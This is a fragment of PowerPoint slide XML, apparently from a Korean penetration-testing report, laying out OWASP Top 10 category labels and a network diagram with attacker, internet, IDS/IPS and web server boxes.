          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4233276">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="6994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j-ea"/>
                        </a:rPr>
                        <a:t>Broken Access Control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940941"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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E47D975-FC21-4579-8493-0310D59567AD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402347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5577"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="149" name="표 148">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87859723-5EE3-45DB-8DEB-D2F1E522E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505679"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="807489" y="4817187"/>
          <a:ext cx="2814995" cy="579120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2814995">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2456029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Injection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868295"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="150" name="표 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB4169D-FBC7-4772-BC69-7A1ABC2CC46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403570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20487"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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id="{0A26DEED-E66A-47A1-985D-24450A9D3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8954"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838067" y="6845587"/>
          <a:ext cx="3550462" cy="579120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3550462">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3797497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Insecure Design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743879"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="TextBox 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB382A04-441C-4574-92D3-5079AA8D57E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860687" y="8670251"/>
            <a:ext cx="4883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Security Misconfiguration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54" name="표 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E091ACF8-B340-4C52-8DFB-B6A13D35478F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01376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575633"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="155" name="표 154">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B5FBE5-11BC-4CB8-B12B-33CC1708D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44020"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="12039600" y="404586"/>
          <a:ext cx="5015063" cy="1066800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5015063">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3136498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Vulnerable and Outdated Components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71579"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="156" name="표 155">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{843F2AE9-A6C6-416F-9191-18222DB2880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1243371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233328"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="157" name="표 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B99A2B-C1D0-45B8-BF4E-4BBAAD7A7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12880"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="13343606" y="2208144"/>
          <a:ext cx="5353969" cy="1066800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5353969">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="935877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Identification and Authentication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03512"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="158" name="표 157">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C06DB1A-2B35-40A6-B7E4-8F7E338626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82488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949424"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="159" name="표 158">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD0035B9-3D75-42BD-8457-048B391C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98871"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="14039158" y="4211956"/>
          <a:ext cx="4445113" cy="1066800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4445113">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="406775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Software and Data Integrity Failures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05769"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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C1BB3E41-217C-4A71-9400-A3CA8662E53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5504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138060"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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F6CE6C6A-C5BC-47F0-9C6F-59321596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36792"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="13412889" y="6438900"/>
          <a:ext cx="4178300" cy="1066800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4178300">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="17851144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Security Logging and Monitoring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3851"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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2717ADDC-9C17-4CDB-A15B-C47098A3843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552973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285036"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="163" name="표 162">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD727111-8426-47BE-B992-5C6EAA82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878"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="12027285" y="8343900"/>
          <a:ext cx="5436520" cy="1066800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5436520">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3500196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Server-Side Request Forgery (SSRF)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55766"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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B154DE8-7D46-4E2B-A0B2-15B43D5EB22A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6582158" y="47442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38D4A05-E6AE-45A7-A3D7-6A66E5DE740A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10684801" y="51054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10</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="28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FEE044-842F-4453-819B-E05955D1E41A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="708857" y="2237456"/>
            <a:ext cx="5526843" cy="1326124"/>
            <a:chOff x="708857" y="2237456"/>
            <a:chExt cx="5526843" cy="132612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09958FD-116A-49AB-A662-42766B3B9DA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="708857" y="2298612"/>
              <a:ext cx="5158543" cy="1207030"/>
              <a:chOff x="708857" y="2298612"/>
              <a:chExt cx="4949847" cy="120703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4C3D858-57F9-43AA-94DC-AE1B168C8B07}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="708857" y="2309758"/>
                <a:ext cx="4568765" cy="1181520"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="7BDA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4A321004-32AD-4264-A68E-950D4C8657CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4751845" y="2298612"/>
                <a:ext cx="906859" cy="1207030"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F0F9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E443E97-4510-4047-AFC0-6C9977D34929}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4906357" y="2237456"/>
              <a:ext cx="1329343" cy="1326124"/>
              <a:chOff x="6527800" y="2527300"/>
              <a:chExt cx="5245100" cy="5232400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="72" name="Picture 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83BB9AC2-E589-482B-A5FE-D7B47F693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7800" y="2527300"/>
                <a:ext cx="5245100" cy="5232400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:effectLst>
                <a:outerShdw blurRad="239160" dist="201490" dir="5400000">
                  <a:srgbClr val="CDD9ED">
                    <a:alpha val="41000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="73" name="Picture 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390AAA35-1925-4CDF-8AE7-BC79A4C8B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9100" y="2768600"/>
                <a:ext cx="4762500" cy="4762500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8693325-63F7-401E-8DEF-2882B08743E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="774058" y="2552700"/>
              <a:ext cx="44363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accent5">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Cryptographic Failures</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="32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8B59E0E-AAA4-40F5-BB89-5C93FF54BC8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5083440" y="2427829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2</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/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305732F-9AB4-45F7-8B53-5230F2CF3265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296015" y="4704499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5A309BD-496D-4025-82AB-B27A2BCE36CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025449" y="668148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30B2C69-4592-4700-927F-21F3527D968F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6515688" y="847261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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="28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4E2796F-9A5D-464F-95EB-BE9B856E5CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12179300" y="226532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9</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800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D66ADC8-8736-4DE8-B1AB-7E258C57BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12917841" y="432696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8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800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039577C-DFA7-4A76-AF9C-3BA32C37FF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12133329" y="65489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7</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800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990E645-924F-4C2F-8BF6-4A3CD4AB40A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10653674" y="85062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6</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20E37AF1-FB28-4DCF-BCC8-6DD140A91E0B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BB1FFB-5DD3-4201-8FD9-A033F2A76E3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1346200" y="1054100"/>
            <a:ext cx="11576050" cy="4089400"/>
            <a:chOff x="1346200" y="1054100"/>
            <a:chExt cx="11576050" cy="4089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6200" y="1054100"/>
              <a:ext cx="3365500" cy="2438400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:outerShdw blurRad="51677" dist="93661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6200" y="1803400"/>
              <a:ext cx="11576050" cy="3340100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:outerShdw blurRad="77752" dist="114886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6200" y="1803400"/>
              <a:ext cx="977900" cy="8001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600200" y="1233488"/>
              <a:ext cx="34544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830"/>
                </a:lnSpc>
              </a:pP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네트워크 구성도</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2800" spc="-500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="S-Core Dream 5 Medium"/>
                </a:rPr>
                <a:t>     </a:t>
              </a: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외부</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="28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 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" spc="-500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="S-Core Dream 5 Medium"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 2" descr="C:\Users\Administrator\Desktop\모의해킹보고서\flat_icon\wifi.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CE1BD3A-9ABF-451B-8D4D-AE71B109D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813" y="2498579"/>
              <a:ext cx="1338319" cy="133831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" descr="C:\Users\Administrator\Desktop\모의해킹보고서\flat_icon\users-group.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239DCC53-63F8-44DF-BA3C-95FD193B2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233" y="2514908"/>
              <a:ext cx="1275734" cy="1275734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="101000" sy="101000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="57000"/>
                </a:srgbClr>
              </a:outerShdw>
              <a:reflection stA="0" endPos="65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C:\Users\Administrator\Desktop\모의해킹보고서\flat_icon\switch.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B560525-42EA-4453-8D66-E84ACD882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018" y="2588986"/>
              <a:ext cx="1161071" cy="1208563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40000"/>
                </a:srgbClr>
              </a:outerShdw>
              <a:reflection stA="18000" endPos="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92E782-FD81-47E2-BD8C-C55D9840C7E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2292967" y="423545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공격자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F266449-DFFB-41C2-95F6-9A8F77C45358}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6410885" y="425237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인터넷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2009C5-262E-4E91-BCCE-37A283D58F29}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10447162" y="414655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IDS/IPS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C1A473B4-10DF-4D00-AE4F-1A02407EC006}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4429770" y="2993384"/>
              <a:ext cx="1133280" cy="5613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DF661550-462F-431E-AB73-70BB61AFCC94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8465038" y="2993384"/>
              <a:ext cx="1133280" cy="5613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2D5639-510A-4457-934F-C6AD87B1F339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1401535" y="5492750"/>
            <a:ext cx="11576050" cy="4089400"/>
            <a:chOff x="1401535" y="5492750"/>
            <a:chExt cx="11576050" cy="40894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014F9EC-4E6A-4D4D-98C5-D2B6D3FE4F0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1401535" y="5492750"/>
              <a:ext cx="11576050" cy="4089400"/>
              <a:chOff x="1336675" y="5363628"/>
              <a:chExt cx="11576050" cy="4089400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Picture 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE27D70-34A7-4599-8DA1-3BC4FD6F8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6675" y="5363628"/>
                <a:ext cx="3365500" cy="2438400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:effectLst>
                <a:outerShdw blurRad="51677" dist="93661" dir="5400000">
                  <a:srgbClr val="CDD9ED">
                    <a:alpha val="41000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="27" name="Picture 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFBB0F41-DAEF-4E3E-A016-565A1C725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6675" y="6112928"/>
                <a:ext cx="11576050" cy="3340100"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:effectLst>
                <a:outerShdw blurRad="77752" dist="114886" dir="5400000">
                  <a:srgbClr val="CDD9ED">
                    <a:alpha val="41000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="TextBox 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A454A34D-DBC4-4FFC-9BBA-76868AE53579}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1611540" y="5519202"/>
                <a:ext cx="34544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83830"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="2800" spc="-500" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ea typeface="S-Core Dream 5 Medium"/>
                  </a:rPr>
                  <a:t>네트워크 구성도</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="2800" spc="-500" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ea typeface="S-Core Dream 5 Medium"/>
                  </a:rPr>
                  <a:t>     </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="2800" spc="-500" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ea typeface="S-Core Dream 5 Medium"/>
                  </a:rPr>
                  <a:t>내부</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="0" i="0" u="none" strike="noStrike" spc="-500" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ea typeface="S-Core Dream 5 Medium"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" spc="-500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="S-Core Dream 5 Medium"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 3" descr="C:\Users\Administrator\Desktop\모의해킹보고서\flat_icon\data-server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B4EB192-E9B2-4CED-A82B-4D0C76B51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597" y="7050448"/>
              <a:ext cx="777935" cy="1082995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="96000" sy="96000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="000000"/>
              </a:outerShdw>
              <a:reflection stA="17000" endPos="6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Administrator\Desktop\모의해킹보고서\flat_icon\data-server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED095582-D4A7-44BF-809A-144BF5D20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1115" y="7050447"/>
              <a:ext cx="777935" cy="1082995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="96000" sy="96000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="000000"/>
              </a:outerShdw>
              <a:reflection stA="17000" endPos="600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C89BBD-0BFB-4441-AFCD-27EDBBDC177F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2265699" y="8567964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웹서버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3E5FEF7-CB09-4190-819A-2ACB05B02313}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
